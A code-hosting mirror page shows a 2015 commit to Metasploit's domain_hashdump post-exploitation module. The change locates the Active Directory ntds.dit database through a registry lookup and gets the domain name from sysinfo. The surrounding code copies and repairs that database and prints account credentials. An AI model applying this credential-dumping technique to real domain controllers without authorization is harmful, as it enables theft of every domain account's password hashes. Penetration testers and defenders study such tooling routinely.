infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

check registry for ntds location 

check the registry for the location of the ntds.dit
file

MSP-12867
bug/bundler_fix
David Maloney 2015-07-02 14:07:47 -05:00
parent 42daf4d38b
commit 89d283da09
No known key found for this signature in database
GPG Key ID: DEDBA9DC3A913DB2
1 changed files with 9 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
modules/post/windows/gather/credentials/domain_hashdump.rb
View File

@ -36,7 +36,7 @@ class Metasploit3 < Msf::Post
unless ntds_file.nil? unless ntds_file.nil?
print_status "Repairing NTDS database after copy..." print_status "Repairing NTDS database after copy..."
print_status repair_ntds(ntds_file) print_status repair_ntds(ntds_file)
realm = domain_name realm = sysinfo["Domain"]
ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file) ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file)
ntds_parser.each_account do |ad_account| ntds_parser.each_account do |ad_account|
print_good ad_account.to_s print_good ad_account.to_s
@ -67,13 +67,16 @@ class Metasploit3 < Msf::Post
database_file_path database_file_path
end end
def domain_name def is_domain_controller?
result = cmd_exec('cmd.exe', '/c systeminfo | findstr /B /C:"Domain"') if ntds_location
result.gsub!(/Domain:\s+/,'') file_exist?("#{ntds_location}\\ntds.dit")
else
false
end
end end
def is_domain_controller? def ntds_location
file_exist?('%SystemDrive%\Windows\ntds\ntds.dit') @ntds_location ||= registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\services\\NTDS\\Parameters\\","DSA Working Directory")
end end
def ntdsutil_method def ntdsutil_method